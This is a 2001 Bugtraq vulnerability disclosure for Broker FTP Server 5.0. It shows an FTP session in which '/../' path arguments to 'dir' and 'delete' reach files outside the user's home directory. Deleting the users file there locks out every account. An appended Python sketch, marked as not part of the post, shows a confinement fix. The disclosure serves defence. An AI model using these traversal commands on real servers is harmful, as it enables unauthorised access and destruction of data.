Bugtraq mailing list archives
Broker Ftp Server 5.0 Vulnerability
From: se00020 () LION CC
Date: Sat, 3 Mar 2001 18:56:23 -0000
Vulnerability:
Users can break out of their root directory and list directories. Depending on the privileges you have, other commands like delete may be executed outside of the home directory.
e:\crap\ was used as homedir.
Deleting files in e:\crap is enabled.

Detail:
Problem: Again relative paths.

dir: listing directories outside of root dir.
Risk: medium-high

230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
-rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29 bisontest.txt
drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
226 File sent ok
FTP: 323 Bytes empfangen in 0,00Sekunden 323000,00KB/s
ftp> cd ..
550 CWD failed. ..: No permission
ftp> dir /../experimental/broker/data/
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 175 Nov 19 2000 UserGrps.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Users.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:33 Users.4800.bak
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:34 Users.4800-Prof.bak
-rw-rw-rw- 1 ftp ftp 31 Mar 03 16:59 BannCtrl.ini
-rw-rw-rw- 1 ftp ftp 34 Mar 03 17:08 KickCtrl.ini
-rw-rw-rw- 1 ftp ftp 38 Mar 03 16:37 Events_1.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:53 Events_lst_1.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Kopie von Users.dat
226 File sent ok
FTP: 629 Bytes empfangen in 0,00Sekunden 629000,00KB/s

delete: deleting files outside of root dir.

ftp> delete /../experimental/broker/data/users.dat
250 File '/../experimental/broker/data/users.dat' deleted.
ftp> quit
221-Thank you for your visit.
221-
221 Goodbye.

C:\>ftp 10.17.3.44
Verbindung mit 10.17.3.44 wurde hergestellt.
220 FTP Server ready [***]
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
530 Login incorrect.
Anmeldung fehlgeschlagen.
ftp>

:( By deleting users.dat, no one will be able to log on ...

put/get commands seem to be secure...
This was tested with win2k and trial version of broker ver. 5.0

se00020 () fhs-hagenberg ac at or se00020 () lion cc
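
Added example, not part of the original post and not Broker FTP Server code: the session above shows `cd ..` being refused while `dir` and `delete` accept `/../...`, so this sketch routes every path argument through one confinement check. The function names are hypothetical; the home directory `e:\crap` and the sample arguments are taken from the post.

```python
import ntpath  # Windows path rules, usable on any platform

class PathEscape(Exception):
    """An FTP path argument would leave the user's home directory."""

def resolve_virtual(cwd, arg):
    """Normalize an FTP path argument to a virtual path rooted at '/'."""
    arg = arg.replace("\\", "/")          # Windows accepts both separators
    parts = [] if arg.startswith("/") else [s for s in cwd.split("/") if s]
    for seg in arg.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:                 # ".." at the virtual root: refuse
                raise PathEscape(arg)
            parts.pop()
        elif ":" in seg:                  # drive letter or alternate stream
            raise PathEscape(arg)
        else:
            parts.append(seg)
    return "/" + "/".join(parts)

def to_real(home, cwd, arg):
    """Map an FTP argument to a real path that is inside home, or raise."""
    virtual = resolve_virtual(cwd, arg)
    real = ntpath.normpath(ntpath.join(home, *virtual.strip("/").split("/")))
    root = ntpath.normcase(ntpath.normpath(home))
    probe = ntpath.normcase(real)
    # Second, independent check on the final path (defence in depth).
    # A real server would also resolve junctions/symlinks before comparing.
    if probe != root and not probe.startswith(root + "\\"):
        raise PathEscape(arg)
    return real

def allowed(home, cwd, arg):
    """True if the argument stays inside home; same answer for any command."""
    try:
        to_real(home, cwd, arg)
        return True
    except PathEscape:
        return False

if __name__ == "__main__":
    HOME = r"e:\crap"                     # home directory from the post
    for arg in ("..", "/../experimental/broker/data/",
                "bisontest.txt", "test/../huhu"):
        print(f"{arg!r:40} allowed={allowed(HOME, '/', arg)}")
```

Calling `to_real` from the handlers for directory listing, delete and change-directory alike removes the inconsistency seen in the session, where only the change-directory command rejected the parent reference.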